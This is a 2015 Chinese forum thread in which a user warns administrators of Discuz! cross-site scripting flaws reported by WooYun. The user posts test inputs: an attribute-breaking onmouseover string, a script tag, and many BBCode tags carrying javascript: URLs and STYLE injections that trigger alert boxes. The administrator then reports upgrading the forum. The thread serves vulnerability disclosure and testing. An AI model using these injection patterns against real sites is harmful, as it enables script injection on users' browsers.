无忧启动论坛

标题: 最近乌云报道Discuz!又出新漏洞,望站长查看一下,并定时升级。。。。 [打印本页]

作者: abc1763613206    时间: 2015-12-8 21:08
标题: 最近乌云报道Discuz!又出新漏洞,望站长查看一下,并定时升级。。。。
漏洞具体细节地址:
http://wooyun.org/bugs/wooyun-2015-0139851
http://wooyun.org/bugs/wooyun-2010-099979
下面是检测↓
2"onmouseover="alert(WooYun233)

管理员/版主对上面那行代码进行编辑时,会弹出WooYun233的窗口。
作者: abc1763613206    时间: 2015-12-8 21:08
本帖最后由 abc1763613206 于 2015-12-10 16:51 编辑

2"onmouseover="alert(WooYun233)
作者: abc1763613206    时间: 2015-12-8 21:09

作者: abc1763613206    时间: 2015-12-8 21:15
NULL
作者: abc1763613206    时间: 2015-12-8 21:15
null
作者: abc1763613206    时间: 2015-12-8 21:15
<script type=”text/javascript”>alert(“提示”)</script>
作者: abc1763613206    时间: 2015-12-8 21:17
[url=javascript:alert('hello')]链接[/url]

[email=javascript:alert('hello')]EMail[/email]

[email=yangtao@rising.com.cn STYLE="background-image: url(javascript:alert('XSS'))"]yangtao@rising.com.cn[/email]





[b STYLE="background-image: url(javascript:alert('XSS'))"]一首诗酸涩涩服务网

[i STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

一二三四五六七北京市

一二三四五六七北京市

[size=4" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

[color=Red" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

[align=center" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

[float=left" STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

一二三四五六七北京市

[size=4 STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

[color=Red STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

[align=center STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市



一二三四五六七北京市


[float=left STYLE="background-image: url(javascript:alert('XSS'))"]一二三四五六七北京市

http://bbsforblog.ikaka.com/posttopic.aspx?forumid=109
作者: wuyou    时间: 2015-12-9 09:47
论坛已经做了版本升级,请再测试,有问题请反馈。
作者: 红毛樱木    时间: 2015-12-9 10:36
这个漏洞什么版本的啊?
作者: tzxinqing    时间: 2015-12-9 11:38
dz漏洞不少
作者: wuyou    时间: 2015-12-9 18:23
红毛樱木 发表于 2015-12-9 10:36
这个漏洞什么版本的啊?

论坛升级了discuz官方2015.12.8程序版本
作者: abc1763613206    时间: 2015-12-9 20:44
那应该就好了,这个是9月份的,12月8日漏洞修补并公布@wuyou




欢迎光临 无忧启动论坛 (http://wuyou.net/) Powered by Discuz! X3.3